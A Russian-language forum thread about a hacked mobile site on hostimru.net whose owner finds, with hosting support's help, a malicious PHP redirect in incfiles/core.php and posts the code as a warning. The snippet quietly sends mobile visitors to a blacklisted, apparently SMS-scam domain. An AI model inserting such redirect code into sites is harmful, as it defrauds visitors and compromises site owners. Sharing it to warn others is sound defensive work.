Хостинг hostimru.net

Pillott, попробуй что нибудь такое "временами перекидывает на другой сайт" может что нибудь и выдаст

А поддержка что говорит ?

Какой то гуляющий редирект прям..

Zidan_@777@, если так гуглить, то мне миллионы ответов выдаст по способам переадресаций, о которых я и так знаю. Тут проблема глубже моего конкретного сайта, написал в тех.поддержку, нужно искать где собака зарыта.

Zidan_@777@ (09.07.2012/13:06)
А поддержка что говорит ?

Я только написал недавно. Дал ссылку на эту тему.

С редиректом проблема решена. Вот что ответили в тех.поддержке

В файле delowap.ru/incfiles/core.php найден редирект на вредоносный сайт - httр://орerauрdt.ru/
Этот сайт находится в черном списке dr.Web
Так же если ввести этот адрес в поисковик, найдется десятки случаев с этим же доменом, на разных хостингах.

А вот собственно сам вредоносный код

if($_SERVER['HTTP_REFERER'] =='') 
{@setcookie("dir", 1, time()+60*60*24*7*30);} 
elseif(preg_match('/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk)/i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["adv"] != 1 && $_COOKIE["dir"] != 1) 
{ 
@setcookie("adv", 1, time()+60*60*24*7); 
@header("Location: httр://орerauрdt.ru/"); 

}

А теперь самое главное - этот код я мог загрузить только с каким-то модулем. Поскольку я все модули беру только на этом сайте, значит кто-то из авторов всунул туда этот код. Проверяйте incfiles/core.php в самом начале, у кого-то тоже может быть такое, а вы и не знаете.

Pillott (09.07.2012/13:09)
Zidan_@777@, если так гуглить, то мне миллионы ответов выдаст по способам переадресаций, о которых я и так знаю. Тут проблема глубже моего конкретного сайта, написал в тех.поддержку, нужно искать где

Напиши админам штоль..

Pillott (09.07.2012/15:12)
С редиректом проблема решена. Вот что ответили в тех.поддержке


А вот собственно сам вредоносный код
[php]if($_SERVER['HTTP_REFERER'] =='')
{@setcookie("dir", 1, time()+60*60*24*7*30);}
elsei

..не каждык в коре буит ковыряцо еще..
Вычислить то просто: сравнить модули на сайтах с которых идёт редирект. Тоесь у кого одинаковые моды..

Эти сайты, на которые перекидывает - лендинги партнерки SMSPirat. В адресе на который кидает должен быть указан ид, по нему можно спросить у поддержки пп кому этот ид пренадлежит.

У меня снова началась эта беда. Порочитал посты. Вывод: пошёл вычислять вредоносного программиста. Хотя куча сомнений, что знаний хватит. Всем спасибо за участие в решении проблемы. Кстати заметил ещё то, что под разные арбузы отдаются разные сайты и ведется запись вашего ип в общую БД, может для их статистики. Не советую использовать без контрольные арбузеры, которые самостоятельно могут соглашаться на скачивание или дальнейшую переадресацию.